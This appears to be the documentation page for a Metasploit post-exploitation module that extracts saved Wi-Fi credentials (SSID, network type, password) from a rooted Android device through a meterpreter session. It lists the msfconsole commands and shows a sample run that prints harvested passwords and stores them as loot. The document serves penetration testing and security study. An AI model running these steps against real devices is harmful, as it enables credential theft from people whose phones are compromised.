## Vulnerable Application This post-exploitation module will extract all saved Wireless access point credentials from the target android device. ## Verification Steps 1. Start `msfconsole` 2. Get a **root** meterpreter session (use exploit/android/local/...) 3. `use post/android/gather/wireless_ap` 4. `set SESSION ` 5. `run` 6. You should be able to see the extracted credentials. ## Options **SESSION** - The session to run the module on. ## Extracted data Wireless AP credentials (SSID, network type and password) ## Scenarios ``` msf5 exploit(multi/handler) > use post/android/gather/wireless_ap msf5 post(android/gather/wireless_ap) > set session 1 session => 1 msf5 post(android/gather/wireless_ap) > run Wireless APs ============ SSID net_type password ---- -------- -------- ADYYYXRoYXJ2YWpvc2hp WPA-PSK   lkjhgfdsa FCP_WiFi              NONE HomeCable             WPA-PSK   p@$$w0rd Troika               WPA-PSK   ika@12345 [+] Secrets stored in: ~/.msf4/loot/...wireless.ap.cred_...txt [*] Post module execution completed msf5 post(android/gather/wireless_ap) > ```